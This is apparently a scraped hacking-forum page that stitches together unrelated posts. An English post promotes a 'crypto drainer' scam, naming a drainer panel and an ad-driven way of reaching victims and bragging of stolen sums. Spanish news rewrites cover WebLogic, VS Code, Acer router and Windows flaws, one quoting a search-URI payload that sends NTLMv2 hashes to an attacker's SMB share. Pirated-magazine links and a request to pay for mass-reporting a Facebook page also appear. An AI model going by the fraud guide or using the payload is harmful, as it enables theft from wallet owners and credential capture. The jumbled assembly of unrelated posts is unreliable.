Hello everyone, after a lot of people asked me to share this method, I am tiering to answer everyone privately and explain. This is a full shared method with step-by-step instructions. For those who are unaware, the method is called "crypto draining." It is a script that you add to any scam page and asks the victim to connect his cryptocurrency wallet as a legitimate action, like connecting or claiming something. After he connects, he receives a signature request, just like any other legitimate website, but within this request is a hdien request that grants permission to take all cryptocurrency once signed.

Here's a detailed guide on how to do it and what you'll need. First, let's talk about tools.

A crypto drainer script is required first. Making one will require time and a solid understanding of blockchain, or you can purchase a script (watch out for scammers; there are plenty). Exogator is what I'm using personally. It provides you with an easy-to-use panel full of templates, methods, and scripts. Although there are other drainers available, this one is the one that I find to be effective.

A good traffic strategy that targets cryptocurrency users is then required. I'm posting free claims, targeting new projects, and using Twitter ads. I am working with a three-person team. As of right now, we are earning £91k. Ads can be started with as little as $100, and as you receive hits, you can increase the budget. Some people make over £1 million in a single hit—that's crazy, isn't it? That £466k was our biggest hit ever. Yes, a well-chosen wallet has the power to transform your life.

Additionally, make sure your approach is sound; don't dive right in without any prior knowledge or study the techniques discussed on panels such as Exogator.

Well, for now, that's it. Any questions you may have will be addressed in a part 2 thread that I will post.

La Agencia de Ciberseguridad y Seguridad de Infraestructuras de Estados Unidos (CISA) ha emitido una nueva alerta de seguridad tras incorporar una vulnerabilidad de alta gravedad que afecta a Oracle WebLogic Server a su Catálogo de Vulnerabilidades Explotadas Conocidas (Known Exploited Vulnerabilities Catalog o KEV). La inclusión de esta falla confirma que está siendo utilizada activamente por actores maliciosos en ataques reales, lo que incrementa significativamente el riesgo para organizaciones que aún no han aplicado las actualizaciones de seguridad correspondientes.

La vulnerabilidad, identificada como CVE-2024-21182, posee una puntuación CVSS de 7.5 y permite que atacantes remotos no autenticados comprometan servidores vulnerables a través de protocolos de comunicación específicos utilizados por Oracle WebLogic. Aunque Oracle publicó los parches de seguridad en julio de 2024, la reciente confirmación de explotación activa por parte de CISA demuestra que numerosos sistemas continúan expuestos.

La advertencia refuerza una tendencia que los expertos en ciberseguridad vienen observando desde hace años: Oracle WebLogic sigue siendo uno de los objetivos favoritos de los ciberdelincuentes debido a su amplia adopción en entornos empresariales y gubernamentales.

¿Qué es CVE-2024-21182 y por qué representa una amenaza importante?

La vulnerabilidad CVE-2024-21182 afecta a Oracle WebLogic Server, una de las plataformas de aplicaciones empresariales más utilizadas para desplegar servicios críticos en organizaciones de todo el mundo.

Según la información publicada por CISA, la falla puede ser explotada por un atacante remoto sin necesidad de autenticación previa siempre que tenga acceso a la red y pueda comunicarse con el servidor mediante los protocolos T3 o IIOP.

El problema permite comprometer la integridad y confidencialidad del sistema afectado, pudiendo derivar en:

• Acceso no autorizado a información sensible.
• Exposición de datos críticos de negocio.
• Manipulación de aplicaciones empresariales.
• Compromiso completo del servidor.
• Movimiento lateral dentro de la infraestructura corporativa.
• Escalada de privilegios en entornos conectados.

CISA advirtió que un ataque exitoso puede otorgar acceso total a todos los datos accesibles por Oracle WebLogic Server, una situación especialmente preocupante para organizaciones que gestionan información financiera, sanitaria, gubernamental o estratégica.

¿Cómo están explotando los atacantes esta vulnerabilidad?

Por el momento, las autoridades no han revelado detalles técnicos específicos sobre las campañas de explotación observadas en la naturaleza.

Tampoco se han publicado indicadores de compromiso ni herramientas utilizadas por los atacantes para explotar CVE-2024-21182.

Sin embargo, la inclusión de la vulnerabilidad en el catálogo KEV implica que existen evidencias verificadas de explotación activa, lo que significa que actores maliciosos ya están aprovechando el fallo para comprometer sistemas vulnerables.

La ausencia de información pública sobre la cadena de explotación suele responder a razones defensivas, ya que divulgar detalles técnicos completos podría facilitar ataques adicionales contra organizaciones que aún no han aplicado los parches correspondientes.

Oracle WebLogic: un objetivo recurrente para ciberdelincuentes

La explotación de vulnerabilidades en Oracle WebLogic no es un fenómeno nuevo.

Durante los últimos años, múltiples grupos de amenazas, operadores de ransomware y botnets han utilizado vulnerabilidades presentes en esta plataforma para obtener acceso inicial a redes corporativas.

Los investigadores de seguridad han documentado repetidamente campañas que aprovechan fallos de WebLogic para:

Desplegar ransomware

Los servidores comprometidos pueden utilizarse como punto de entrada para cifrar sistemas corporativos y exigir pagos millonarios a las víctimas.

Minería ilegal de criptomonedas

Los atacantes suelen instalar software de cryptojacking para utilizar los recursos de procesamiento del servidor comprometido.

Reclutamiento para botnets

Los sistemas vulnerables pueden convertirse en nodos de redes maliciosas utilizadas para ataques DDoS, distribución de malware o campañas de spam.

Robo de información corporativa

Los atacantes pueden acceder a bases de datos, credenciales, documentos internos y otra información confidencial.

Debido a estas capacidades, WebLogic continúa siendo uno de los servicios empresariales más vigilados por grupos de ciberdelincuencia avanzada.

La rápida explotación de nuevas vulnerabilidades preocupa a los expertos

La advertencia de CISA se produce pocos meses después de que investigadores de seguridad observaran intentos de explotación automatizada contra otra vulnerabilidad crítica de Oracle WebLogic.

A principios de marzo de 2026, expertos de CloudSEK informaron sobre actividades maliciosas dirigidas a CVE-2026-21962, una vulnerabilidad con puntuación CVSS máxima de 10.0.

Según los investigadores, los intentos de explotación comenzaron poco tiempo después de que se hiciera público un código de prueba de concepto (PoC), demostrando la rapidez con la que los actores maliciosos integran nuevas vulnerabilidades en sus arsenales de ataque.

Este comportamiento confirma una realidad cada vez más frecuente en el panorama de amenazas actual: el tiempo disponible para aplicar parches se reduce drásticamente una vez que una vulnerabilidad se hace pública.

Impacto potencial para organizaciones y organismos gubernamentales

La explotación de CVE-2024-21182 podría tener consecuencias significativas para organizaciones que dependen de Oracle WebLogic para ejecutar aplicaciones críticas.

Entre los posibles escenarios de riesgo se encuentran:

Interrupción de operaciones

Los atacantes podrían afectar servicios empresariales esenciales y provocar tiempos de inactividad prolongados.

Filtración de datos sensibles

La información almacenada o procesada por aplicaciones WebLogic podría quedar expuesta.

Compromiso de infraestructuras críticas

Entidades gubernamentales y organizaciones estratégicas podrían sufrir accesos no autorizados a sistemas clave.

Propagación de ataques

Una vez comprometido un servidor, los atacantes pueden utilizarlo para expandirse a otros sistemas de la red.

En sectores altamente regulados, este tipo de incidentes también puede derivar en sanciones legales, incumplimientos normativos y daños reputacionales considerables.

CISA establece una fecha límite para aplicar los parches

Como parte de la Directiva Operacional Vinculante (BOD 22-01), CISA ha ordenado a las agencias pertenecientes al Poder Ejecutivo Civil Federal de Estados Unidos (FCEB) aplicar las actualizaciones necesarias antes del 4 de junio de 2026.

El objetivo es reducir la superficie de exposición frente a ataques activos que ya están aprovechando esta vulnerabilidad.

Aunque la directiva se aplica específicamente a organismos federales estadounidenses, los expertos recomiendan que todas las organizaciones que utilicen Oracle WebLogic adopten medidas similares de manera inmediata.

Recomendaciones de seguridad para administradores

Las organizaciones que ejecutan Oracle WebLogic Server deberían implementar las siguientes acciones prioritarias:

• Verificar inmediatamente la versión instalada del servidor.
• Aplicar los parches de seguridad publicados por Oracle en julio de 2024.
• Revisar registros de actividad en busca de accesos sospechosos.
• Monitorizar conexiones a través de protocolos T3 e IIOP.
• Implementar segmentación de red para limitar movimientos laterales.
• Aplicar controles de acceso estrictos sobre servidores críticos.
• Utilizar soluciones EDR y monitoreo continuo para detectar comportamientos anómalos.

Además, se recomienda realizar evaluaciones de vulnerabilidades periódicas para identificar sistemas expuestos antes de que puedan ser comprometidos.

La explotación activa convierte a CVE-2024-21182 en una prioridad crítica

La incorporación de CVE-2024-21182 al Catálogo de Vulnerabilidades Explotadas Conocidas de CISA es una señal clara de que la amenaza es real y está afectando activamente a organizaciones en entornos productivos.

Aunque el fallo fue corregido hace casi dos años, la persistencia de sistemas sin actualizar continúa ofreciendo oportunidades valiosas para ciberdelincuentes que buscan acceso inicial a infraestructuras corporativas.

Ante este escenario, la aplicación inmediata de los parches de Oracle, junto con una estrategia sólida de gestión de vulnerabilidades, resulta esencial para reducir el riesgo de compromiso y proteger activos críticos frente a ataques cada vez más sofisticados.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Investigadores en ciberseguridad han revelado una nueva vulnerabilidad sin parchear en Windows que podría ser utilizada por ciberdelincuentes para obtener hashes NTLMv2 de usuarios legítimos, abriendo la puerta a ataques de retransmisión, movimientos laterales y posibles compromisos de red.

El hallazgo, divulgado por los expertos de Huntress, afecta al manejador de URI "search:" de Windows y comparte importantes similitudes con una vulnerabilidad corregida recientemente por Microsoft, identificada como CVE-2026-33829. Aunque el fabricante fue informado de manera responsable sobre el problema, la compañía decidió no emitir una actualización de seguridad debido a que considera que el fallo no alcanza el umbral requerido para una corrección prioritaria.

La revelación ha generado preocupación entre profesionales de seguridad y administradores de sistemas, ya que el fallo puede ser explotado mediante técnicas relativamente sencillas para provocar que un sistema Windows revele credenciales de autenticación NTLMv2 a servidores controlados por atacantes.

¿Qué es NTLMv2 y por qué sigue siendo un objetivo atractivo?

NTLM (New Technology LAN Manager) es un protocolo de autenticación desarrollado por Microsoft que continúa presente en numerosos entornos empresariales, especialmente en infraestructuras heredadas y redes híbridas.

Aunque tecnologías más modernas como Kerberos han reemplazado gran parte de su funcionalidad, NTLM sigue siendo ampliamente utilizado para la autenticación de usuarios, el acceso a recursos compartidos y determinados servicios internos de Windows.

Cuando un sistema intenta autenticarse utilizando NTLMv2, genera un hash criptográfico que, si bien no contiene directamente la contraseña del usuario, puede ser aprovechado por atacantes para realizar diferentes tipos de ataques.

Entre ellos destacan:

• Ataques de retransmisión NTLM.
• Movimiento lateral dentro de la red.
• Acceso no autorizado a recursos corporativos.
• Escalada de privilegios.
• Reconocimiento avanzado de infraestructura.

Por este motivo, cualquier vulnerabilidad capaz de exponer hashes NTLMv2 representa una amenaza significativa para la seguridad empresarial.

Cómo funciona la nueva vulnerabilidad descubierta por Huntress

Según explicó Andrew Schwartz, investigador de Huntress, el problema reside en el manejador URI "search:" integrado en Windows.

La vulnerabilidad permite que un atacante cree enlaces especialmente manipulados capaces de inducir al sistema operativo a conectarse automáticamente a un recurso SMB remoto controlado por el atacante.

El comando utilizado para explotar esta debilidad tiene la siguiente estructura:

search=test&crumb=location:\servidor_malicioso\share

Cuando la víctima interactúa con el enlace, Windows intenta acceder a la ubicación especificada utilizando una ruta UNC (Universal Naming Convention).

Durante este proceso, el sistema inicia automáticamente un procedimiento de autenticación NTLM para intentar conectarse al recurso remoto.

Como consecuencia, el hash Net-NTLMv2 del usuario es enviado al servidor controlado por el atacante, quien puede capturarlo para posteriores acciones maliciosas.

Similitudes con CVE-2026-33829

Los investigadores señalaron que este nuevo problema comparte numerosas características con la vulnerabilidad CVE-2026-33829, corregida por Microsoft en abril de 2026.

Aquella vulnerabilidad afectaba al manejador URI utilizado por la Herramienta de Recorte de Windows (Snipping Tool), específicamente a través del parámetro "filePath".

El fallo permitía que la aplicación accediera a rutas UNC arbitrarias sin realizar una validación adecuada, provocando exactamente el mismo resultado: la filtración de hashes Net-NTLMv2 mediante conexiones SMB controladas por atacantes.

En ambos casos se observan características prácticamente idénticas:

• Exposición de hashes NTLMv2.
• Requerimiento de interacción del usuario.
• Uso de rutas UNC remotas.
• Posibilidad de ataques de retransmisión.
• Clasificación de gravedad moderada.

Sin embargo, mientras Microsoft corrigió CVE-2026-33829, decidió no actuar sobre esta nueva variante.

Un problema que recuerda a vulnerabilidades anteriores

Aunque la vulnerabilidad ha ganado notoriedad recientemente, el uso del parámetro "crumb" para provocar fugas de credenciales no es completamente nuevo.

Los investigadores recordaron que una técnica similar ya había sido documentada anteriormente en la vulnerabilidad CVE-2023-35636, analizada por expertos de seguridad en 2024.

Esto demuestra que los manejadores URI continúan representando una superficie de ataque relevante dentro del ecosistema Windows, especialmente cuando interactúan con protocolos heredados como SMB y NTLM.

La persistencia de este tipo de escenarios evidencia las dificultades que enfrentan los fabricantes para eliminar por completo riesgos asociados a componentes históricos que aún forman parte de millones de sistemas empresariales.

Riesgos para organizaciones y entornos corporativos

La filtración de hashes NTLMv2 puede parecer un problema menor a primera vista, pero en realidad puede tener consecuencias significativas para la seguridad de una organización.

Una vez capturado el hash, un atacante puede utilizar herramientas especializadas para ejecutar ataques de retransmisión NTLM contra otros sistemas dentro de la red.

En entornos mal segmentados, esto puede facilitar:

Acceso a recursos internos

Los atacantes pueden autenticarse frente a servicios que acepten conexiones NTLM.

Movimiento lateral

La obtención de credenciales válidas facilita el desplazamiento entre diferentes sistemas de la infraestructura.

Escalada de privilegios

En determinadas circunstancias, los atacantes podrían aprovechar configuraciones inseguras para obtener permisos elevados.

Compromiso de servicios críticos

Controladores de dominio, servidores de archivos y aplicaciones empresariales podrían convertirse en objetivos posteriores.

Por esta razón, incluso vulnerabilidades clasificadas como moderadas pueden representar un riesgo considerable cuando son utilizadas como parte de cadenas de ataque más complejas.

Microsoft rechaza emitir un parche

Tras recibir la divulgación responsable el 15 de abril de 2026, Microsoft analizó el problema y decidió no desarrollar una corrección.

Según la respuesta proporcionada a los investigadores, la compañía indicó que únicamente los casos catalogados como de gravedad Importante o Crítica cumplen actualmente los criterios necesarios para recibir mantenimiento de seguridad dentro de su programa de respuesta.

Esta decisión ha generado debate entre profesionales del sector, quienes consideran que las fugas de hashes NTLM continúan siendo una amenaza relevante en redes empresariales modernas.

Medidas de mitigación recomendadas

Ante la ausencia de una solución oficial, los especialistas recomiendan adoptar varias medidas defensivas para reducir significativamente la superficie de ataque.

Bloquear SMB saliente

Las organizaciones deberían restringir el tráfico SMB saliente a través de los puertos TCP 445 y TCP 139 en aquellos equipos que no requieran este tipo de conexiones.

Habilitar la firma SMB

La firma SMB dificulta considerablemente los ataques de retransmisión al garantizar la integridad de las comunicaciones.

Desactivar NTLM cuando sea posible

Microsoft lleva años recomendando la transición hacia mecanismos de autenticación más seguros como Kerberos.

Implementar segmentación de red

Una adecuada segmentación limita el impacto potencial de cualquier credencial comprometida.

Capacitar a los usuarios

La mayoría de los escenarios de explotación requieren que la víctima interactúe con enlaces maliciosos, por lo que la concienciación sigue siendo una medida fundamental.

Un nuevo recordatorio de los riesgos asociados a NTLM

La nueva vulnerabilidad descubierta en el manejador URI "search:" de Windows pone de manifiesto que NTLM continúa siendo una superficie de ataque relevante dentro de los entornos corporativos modernos.

Aunque Microsoft considera que el problema no justifica una actualización de seguridad, la posibilidad de capturar hashes NTLMv2 y utilizarlos en ataques posteriores representa un riesgo que las organizaciones no deben ignorar.

Mientras no exista una corrección oficial, la implementación de controles defensivos como el bloqueo de SMB saliente, la firma SMB obligatoria y la eliminación progresiva de NTLM seguirá siendo la mejor estrategia para reducir la exposición frente a este tipo de amenazas y fortalecer la seguridad de la infraestructura empresarial.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Una nueva vulnerabilidad Zero-Day descubierta en Visual Studio Code (VS Code) ha encendido las alarmas en la comunidad de ciberseguridad tras la publicación de un código de explotación funcional que permite a los atacantes robar tokens de autenticación de GitHub. El fallo, que actualmente no cuenta con un parche oficial ni un identificador CVE asignado, podría facilitar el acceso no autorizado a repositorios privados y otros recursos asociados a las cuentas de las víctimas.

El investigador de seguridad Ammar Askar fue quien dio a conocer públicamente tanto los detalles técnicos de la vulnerabilidad como una prueba de concepto (PoC) capaz de demostrar el impacto real del problema. Según explicó, el fallo afecta a la integración entre GitHub y You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, la versión web de Visual Studio Code que permite editar repositorios directamente desde el navegador.

La divulgación pública del exploit ha generado preocupación debido a que los atacantes podrían aprovechar esta vulnerabilidad para obtener acceso a información sensible almacenada en repositorios privados, comprometiendo proyectos de desarrollo, código fuente propietario y datos empresariales críticos.

¿Cómo funciona la vulnerabilidad Zero-Day en VS Code?

El fallo se encuentra relacionado con el sistema de comunicación utilizado por las WebViews de Visual Studio Code. Las WebViews son componentes que permiten ejecutar contenido web dentro del entorno del editor y facilitan la interacción entre extensiones y la interfaz principal de la aplicación.

De acuerdo con la investigación de Askar, un atacante puede abusar del mecanismo de intercambio de mensajes entre la WebView y el editor principal para ejecutar código JavaScript malicioso capaz de simular pulsaciones de teclado y realizar acciones automatizadas sin el consentimiento del usuario.

El escenario de ataque comienza cuando una víctima es engañada para hacer clic en un enlace especialmente diseñado. Una vez abierto el enlace, el código malicioso aprovecha la debilidad presente en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login para instalar silenciosamente una extensión maliciosa dentro de la sesión del navegador.

Posteriormente, dicha extensión obtiene acceso al token OAuth utilizado por GitHub para autenticar al usuario y permitir la interacción con los repositorios.

El riesgo real: acceso a todos los repositorios privados

Uno de los aspectos más preocupantes de esta vulnerabilidad es el alcance de los permisos asociados al token OAuth robado.

Según explicó el investigador, GitHub envía un token de autenticación a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login para permitir que el usuario interactúe con sus repositorios directamente desde la interfaz web de Visual Studio Code.

Sin embargo, el token no está limitado únicamente al repositorio específico desde el que se inició la sesión.

Esto significa que, una vez comprometido, el atacante puede utilizar dicho token para acceder a todos los repositorios privados a los que tenga permisos la víctima.

Entre las acciones potenciales que podrían realizarse destacan:

• Enumerar repositorios privados.
• Acceder al contenido completo del código fuente.
• Descargar proyectos internos.
• Consultar historiales de cambios.
• Obtener información sobre colaboradores y configuraciones.
• Exfiltrar datos confidenciales almacenados en los repositorios.

Para organizaciones que utilizan GitHub como plataforma principal de desarrollo, este escenario representa un riesgo significativo para la propiedad intelectual y la seguridad corporativa.

Publicación del exploit y divulgación responsable

La vulnerabilidad fue revelada públicamente junto con una prueba de concepto funcional, una decisión que ha generado debate dentro de la comunidad de seguridad informática.

Askar afirmó que notificó a GitHub aproximadamente una hora antes de hacer pública la investigación. Sin embargo, aclaró que su intención era realizar una divulgación completa debido a experiencias negativas previas con el proceso de gestión de vulnerabilidades de Microsoft.

Según el investigador, en ocasiones anteriores reportó vulnerabilidades relacionadas con VS Code que, según sus declaraciones, fueron corregidas sin reconocimiento formal y clasificadas como problemas sin impacto en la seguridad.

Esta situación lo llevó a adoptar una postura de divulgación pública inmediata para futuros hallazgos relacionados con Visual Studio Code.

Crecen las críticas al proceso de respuesta de seguridad de Microsoft

La polémica surge en un contexto donde varios investigadores han expresado públicamente su descontento con el funcionamiento del Microsoft Security Response Center (MSRC), el equipo responsable de gestionar reportes de vulnerabilidades en productos de Microsoft.

Durante los últimos meses, diversos fallos Zero-Day han sido revelados por investigadores independientes sin esperar los ciclos tradicionales de divulgación coordinada.

Uno de los casos más conocidos involucra al investigador anónimo conocido como "Nightmare Eclipse", responsable de revelar múltiples vulnerabilidades que afectaban a diferentes componentes del ecosistema Windows.

Entre los fallos divulgados se encuentran:

• BlueHammer.
• RedSun.
• GreenPlasma.
• MiniPlasma.
• YellowKey.
• UnDefender.

Algunos de estos problemas ya han sido vinculados a ataques reales, aumentando la presión sobre Microsoft para acelerar sus procesos de respuesta y corrección.

Microsoft responde a las críticas

Tras la publicación del nuevo Zero-Day de Visual Studio Code, Microsoft emitió una declaración oficial en la que reafirmó su compromiso con la comunidad de investigación en seguridad.

La compañía destacó que valora el trabajo realizado por los investigadores independientes y aseguró que continúa evaluando de manera rápida los problemas reportados para implementar mitigaciones y protecciones lo antes posible.

Asimismo, Microsoft señaló que, aunque los investigadores pueden decidir cuándo y cómo divulgar sus hallazgos, la empresa mantiene equipos especializados preparados para analizar vulnerabilidades, desarrollar correcciones y ofrecer orientación de seguridad a sus clientes.

La declaración busca reducir la tensión generada por las recientes controversias relacionadas con la divulgación de vulnerabilidades y la gestión de reportes por parte del MSRC.

Cómo protegerse mientras no exista un parche oficial

Dado que actualmente no existe una actualización de seguridad disponible para corregir este fallo, los usuarios de Visual Studio Code y GitHub deben adoptar medidas preventivas para minimizar el riesgo de explotación.

La principal recomendación consiste en eliminar las cookies y los datos locales asociados a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login en el navegador.

Para hacerlo, se deben seguir estos pasos:

• Abrir You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login en el navegador.
• Hacer clic en el icono de configuración ubicado junto a la barra de direcciones.
• Acceder a la sección "Cookies y datos del sitio".
• Seleccionar "Gestionar los datos del sitio en el dispositivo".
• Eliminar todos los datos almacenados relacionados con You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

Al realizar este procedimiento, GitHub mostrará una advertencia explícita cuando una extensión intente iniciar sesión utilizando la cuenta del usuario, proporcionando una capa adicional de protección frente a intentos de explotación.

Un nuevo recordatorio sobre los riesgos de las extensiones y aplicaciones web

La aparición de este nuevo Zero-Day en Visual Studio Code demuestra una vez más cómo los mecanismos de integración entre aplicaciones web, navegadores y plataformas de desarrollo pueden convertirse en objetivos atractivos para los ciberdelincuentes.

El robo de tokens OAuth representa una amenaza especialmente peligrosa porque permite a los atacantes actuar en nombre de la víctima sin necesidad de conocer contraseñas o superar sistemas de autenticación multifactor.

Mientras Microsoft y GitHub analizan el problema y desarrollan una solución definitiva, las organizaciones y desarrolladores deben extremar las precauciones al interactuar con enlaces externos y revisar cuidadosamente los permisos otorgados a extensiones y aplicaciones conectadas a sus cuentas de GitHub.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Acer ha confirmado la existencia de dos vulnerabilidades Zero-Day de máxima gravedad que afectan a sus routers mesh Wave 7, una situación que podría exponer a miles de usuarios a ataques remotos capaces de comprometer por completo la seguridad de sus redes domésticas y empresariales.

Los fallos de seguridad, identificados como CVE-2026-49200 y CVE-2026-49201, fueron descubiertos y reportados por el investigador de seguridad Gergo Pap. Según el aviso oficial emitido por Acer, ambas vulnerabilidades afectan a los dispositivos Wave 7 que ejecutan la versión de firmware T7c_GBL_1.01.000055 o anteriores.

La gravedad de estos errores radica en que pueden ser explotados por atacantes remotos sin necesidad de autenticación previa, permitiendo desde el robo de credenciales hasta la implantación de accesos persistentes mediante puertas traseras, comprometiendo la integridad y confidencialidad de las comunicaciones de los usuarios.

CVE-2026-49200: exposición de credenciales en texto plano

La primera vulnerabilidad identificada, catalogada como CVE-2026-49200, corresponde a un problema de control de acceso insuficiente que permite a atacantes no autenticados acceder a información altamente sensible almacenada dentro del router.

De acuerdo con la documentación publicada por Acer, el archivo de registro denominado acer_cgi.log puede ser consultado a través de la interfaz web sin requerir autenticación. El problema es especialmente grave porque dicho archivo contiene credenciales almacenadas en texto claro.

Entre los datos expuestos se encuentran:

• Credenciales de acceso al panel web de administración.
• Datos de autenticación para servicios Telnet.
• Información que podría facilitar movimientos laterales dentro de la red.

La presencia de credenciales sin cifrar en archivos accesibles públicamente representa una vulnerabilidad crítica que podría ser explotada para obtener acceso administrativo completo al dispositivo.

Una vez comprometido el router, un atacante podría modificar configuraciones de red, interceptar tráfico, redirigir conexiones, desplegar malware o utilizar el dispositivo como punto de acceso para comprometer otros equipos conectados.

CVE-2026-49201: clave criptográfica codificada permite instalar puertas traseras

La segunda vulnerabilidad, identificada como CVE-2026-49201, presenta un escenario igualmente preocupante.

Según Acer, el componente upload.cgi, encargado de gestionar las copias de seguridad del dispositivo, contiene una clave criptográfica AES codificada de forma estática dentro del firmware.

Este tipo de práctica es considerada una debilidad de seguridad crítica porque permite que un atacante que conozca dicha clave pueda:

• Descifrar archivos de respaldo del sistema.
• Modificar configuraciones internas del router.
• Alterar parámetros de seguridad.
• Reempaquetar y cifrar nuevamente las copias manipuladas.
• Introducir puertas traseras persistentes difíciles de detectar.

En términos prácticos, un ciberdelincuente podría crear una copia de seguridad modificada que incluya mecanismos de acceso ocultos y posteriormente restaurarla en el dispositivo, obteniendo control permanente incluso después de reinicios o cambios superficiales de configuración.

Los expertos advierten que este tipo de vulnerabilidades suelen ser especialmente peligrosas porque facilitan ataques persistentes y difíciles de erradicar, permitiendo que los atacantes mantengan acceso prolongado a la infraestructura comprometida.

Impacto de las vulnerabilidades en la seguridad de la red

Los routers representan uno de los componentes más importantes dentro de cualquier entorno conectado, ya que actúan como punto central de comunicación entre dispositivos locales e Internet.

Cuando un router resulta comprometido, las consecuencias pueden extenderse a toda la red.

Entre los riesgos asociados a estas vulnerabilidades destacan:

Robo de información sensible

Los atacantes podrían interceptar tráfico de red y recopilar información confidencial, incluyendo credenciales, sesiones activas y datos personales.

Secuestro de tráfico

Un ciberdelincuente podría modificar configuraciones DNS para redirigir a los usuarios hacia sitios web maliciosos diseñados para el robo de credenciales o la distribución de malware.

Persistencia avanzada

La vulnerabilidad relacionada con la clave AES codificada facilita la instalación de mecanismos de acceso persistente que pueden permanecer activos durante largos períodos.

Compromiso de dispositivos conectados

Una vez obtenido el control del router, los atacantes podrían utilizarlo como plataforma para lanzar ataques contra ordenadores, smartphones, dispositivos IoT y otros equipos conectados a la misma red.

Acer prepara actualizaciones de seguridad

Aunque actualmente no existen parches públicos disponibles para corregir estas vulnerabilidades, Acer aseguró que ya está trabajando en soluciones de seguridad.

La compañía indicó que las correcciones serán distribuidas mediante futuras actualizaciones de firmware programadas para finales de junio de 2026.

El fabricante recomendó a todos los usuarios mantenerse atentos a los avisos oficiales y aplicar las actualizaciones tan pronto como estén disponibles para minimizar la superficie de ataque.

Cómo actualizar el firmware del router Acer Wave 7

Una vez que Acer publique las correcciones, los usuarios podrán verificar e instalar las actualizaciones siguiendo estos pasos:

• Conectar un ordenador al router Acer Wave 7 mediante Wi-Fi o cable Ethernet.
• Abrir un navegador web.
• Acceder al panel de administración mediante:
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• Iniciar sesión con una cuenta de administrador.
• Dirigirse al apartado Gestión de Sistemas.
• Seleccionar Actualización de firmware.
• Pulsar en Comprobar actualizaciones.
• Instalar la versión más reciente disponible.

Medidas de mitigación recomendadas

Hasta que los parches oficiales sean liberados, Acer recomienda implementar medidas preventivas para reducir el riesgo de explotación.

Las principales recomendaciones incluyen:

• Desactivar la administración remota del router siempre que sea posible.
• Limitar el acceso remoto exclusivamente a direcciones IP de confianza.
• Cambiar periódicamente las credenciales administrativas.
• Supervisar registros de actividad sospechosa.
• Deshabilitar servicios innecesarios como Telnet si el dispositivo lo permite.
• Mantener segmentados los dispositivos críticos dentro de la red.

Un recordatorio de los riesgos asociados a los dispositivos conectados

La aparición de estas vulnerabilidades en los routers Acer Wave 7 vuelve a poner de manifiesto la importancia de la seguridad en los dispositivos de red. Los routers son objetivos frecuentes de los ciberdelincuentes debido a su posición estratégica dentro de las infraestructuras digitales.

La combinación de credenciales expuestas en texto plano y claves criptográficas codificadas representa una amenaza significativa que podría ser aprovechada para comprometer completamente una red doméstica o empresarial.

Mientras Acer finaliza el desarrollo de los parches correspondientes, los usuarios afectados deben adoptar medidas de mitigación inmediatas y mantenerse atentos a las futuras actualizaciones de firmware que corregirán estos dos peligrosos fallos Zero-Day.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

PCWorld – June 2026



Language: English | Format: pdf |2026| Size: 32 MB

https://www.up-4ever.net/c9ajmthamk41
https://mega4upload.net/wme4761ih5tt
https://www.file-upload.org/ivei6okzpltp
https://rg.to/file/7e4df24deece3c5e13293b795f7e3453

Además que hay otra duda respecto a la compra de los vpn... Si compro una vpn mi información se la queda el proveedor del servicio?

Hola.

Hay algún experto en el tema que me puede explicar como funcionan y si es detectable la salida y entrada de datos al al recibir y finalizar la transferencia de datos??

Quiero aclarar que tengo una duda respecto al tema final.

APC – Issue 559, June 2026



Language: English | Format: pdf |2026| Size: 25 MB

https://www.up-4ever.net/n6caz3rklybr
https://mega4upload.net/x591ksp1fx19
https://www.file-upload.org/jmetcwva7mnd
https://rg.to/file/d0ce6b453ff701296ae9d15a0fad19dd

Buenas Tardes.

Alguien maneja reportes masivos en el grupo para de bajar una pagina de facebook?

Si es asi favor de enviar mensaje con costos.

Muchas gracias.